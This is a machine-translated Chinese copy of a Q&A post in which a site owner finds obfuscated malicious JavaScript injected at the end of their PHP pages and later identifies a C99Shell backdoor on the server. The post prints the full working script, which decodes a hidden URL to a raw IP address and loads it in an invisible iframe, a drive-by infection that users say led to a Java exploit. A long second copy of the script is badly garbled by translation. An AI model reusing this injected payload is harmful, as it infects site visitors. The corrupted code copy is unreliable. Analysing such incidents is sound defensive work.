PHP脚本：末尾的恶意JavaScript代码_Php_Javascript_Security_Virus

PHP脚本：末尾的恶意JavaScript代码

php javascript security

PHP脚本：末尾的恶意JavaScript代码,php,javascript,security,virus,Php,Javascript,Security,Virus,问题：在我的Web空间中，有以以下内容结尾的PHP文件： <?php include 'footer.php'; ?> 在这一行之前，文件中还有HTML代码当然，浏览器中的输出以以下内容结束： </body> </html> 但是昨天，在最后突然出现了一些恶意代码。my index.php的输出是： </body> </html><body><script> var i={j:{i:{i:'~',

问题：

在我的Web空间中，有以以下内容结尾的PHP文件：

<?php include 'footer.php'; ?>

在这一行之前，文件中还有HTML代码

当然，浏览器中的输出以以下内容结束：

</body>
</html>

但是昨天，在最后突然出现了一些恶意代码。my index.php的输出是：

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>


“我的职业生涯是：{{j:{j:{{j:{{j:{j:{j:{j:{j:{j:{j:{j:{j:{j:{j:{j:{j:{j:{i:{i:{i:{i:{i:，l:{i:，l:{i:，l:{i:{i:{i:{i:，l:{i:，l:，l：，l:，l:{i:，l:，l:，l:{i:，l:，i:，i:，l：，l：，l：，l:，l：，l：，l：，l：，i:，l：，l：''''''''''''''''''''''''''''''''x64\x64\x65\x6e'；l['\x76\x61\x6c\x75\x65']=j；l['\x69\x64']='\x6a'；文档['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64']（l）；}catch（j）{return false；}
return true；}，l:function（）{try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']（'\x6a'）；}catch（l）{return false；}
返回l.价值；}，j:：}，j:返回返回l.价值；}，j:：，j:：：，j:：：，j：功能：{var l=i.i.i.i.1，j:函数：{var l=i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i（i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i.i（（（（（（（'75.75.75.75.75.75.75.67.67.67.67.63.63.63.63.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.（l）？l:'trashtext'；返回j | | false；}，l:function（）{var l=document[4]4.7 7 7“C”C’；l[[[[[[4\X6 3\X6 6 3\X6 6 6 3\X6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 3 \X6 6 6 6 6 6 6 6 3\X6 6 6 6 6 6 6 3\X6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 3 \7 7 7 7 3\X6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 7 7 7 \7 7 7 7 7 \7 7 7 7 7 7 7 7 \7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 \7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7\x6c\x61\x79']='none'；l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c'；l['\x69\x64']='\x6c'；文档[7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 6 6 6 6 6 6 6 6 6 6 6 8 8 8 8\X6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4“\x69\x66\x72\x61\x6d\x65”）；j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x64\x68']；j[7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7）%26+（j&32）+65）；}）；}，l：函数（l）{返回i.i.j.i（l）（7）假；j：功能（l）的j：函数（l）的尝试{{{{l(l \（）；}捕捉（l）{{{}}}}}}}警察局的7.4\x74\X4\X4\X4\X4\X4\X4\X4\X4\X4\X4\X4\X4\X4\X4\X6\X4\X6\7\7\警察警察局的任何人士....若没有任何一，3\X5\X5\X7\X7\10\10\10\10\10\10\10\可能可能可能可能...................可能.......................可能.............................:'52'}}}
i、 i.l.j（）；

我在我的网站上打开了这个文件（通过FTP下载），我看到有人把这个代码放进了这个文件

这是怎么发生的？

我能想象的唯一方式是：

有人得到了我的FTP密码。但他不会只把它放在一个文件中。他可能会造成更大的破坏。所以我无法想象这种情况
我自己的电脑上也有病毒。我用Notepad++编辑，用FileZilla上传。可能这些程序也被污染了，我在不知情的情况下上传了恶意代码
有人使用安全漏洞（XSS）将代码放入页面。但他不可能将其直接放入文件，是吗

症状：

用户报告说Firefox中出现了一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人在他们的PC上有了漏洞攻击.Java.CVE-2010-0886.a

这是因为恶意代码吗？代码到底做了什么

你能帮我吗？

请帮帮我，我真的很绝望

也许还有一个问题，如果你知道我是如何得到它的：我怎样才能防止将来发生类似的事情

编辑#1:

我在我的Web空间的根目录中找到了一个名为“x76x09.php”的文件。它的文件大小为44.281字节。我已经下载并试图打开它。但是我的防病毒软件说它是特洛伊木马（特洛伊木马。脚本。224490）。我想这个文件已经被执行，并将恶意代码添加到了“index.php”中在每个目录中。这有帮助吗？特洛伊木马怎么会进入我的网络空间？这是一个众所周知的病毒吗

编辑#2:

我的主人说他现在可以确定文件不是通过FTP上传的。所以感染不是通过FTP发生的。根据我的主人的说法，一定是不安全的脚本

编辑#3:

根据PHPSecInfo的安全漏洞：

允许\u url\u fopen=1
允许\u url\u include=1
expose_php=1
file_uploads=1（这是恶意“x76x09.php”文件的罪魁祸首吗？）
组id=99
用户id=99

编辑#4:

我已经分析了在我的Web服务器上执行的文件

因此，这种病毒似乎被称为：

PHP/C99Shell.BF
后门/PHP.C99Shell
后门。通用_c.CQA
特洛伊木马程序.Script.224490
Exploit.PHP.635
Backdoor.PHP.C99Shell.bf
特洛伊木马程序.Script.224490

它们中的一些可能会导致我的Web空间中添加恶意代码的恶意文件吗？

您与谁一起托管？一些托管者存在安全漏洞，可能会受到攻击

你在使用WordPress吗？也有很多报道。最好的办法是用谷歌搜索有类似问题的人，这也会导致问题的原因，从而找到解决方案。

我建议更改FTP或SSH密码以确保安全。如果你使用主机提供商，你应该：o通知他们违规行为。如果您没有日志调查此事，那么他们可能会。您还应该通过谷歌搜索添加到页面中的代码，查看是否可以找到其他内容。

看起来您的服务器已受损，您是否也在共享主机上

您可以通过以下方式了解服务器的安全配置：

cd web_files_directory
chown -R some_not_web_server_user:some_not_web_server_group .
find . -type f | xargs chmod 644
find . -type d | xargs chmod 755

http://www.qualys.com/products/qg_suite/was/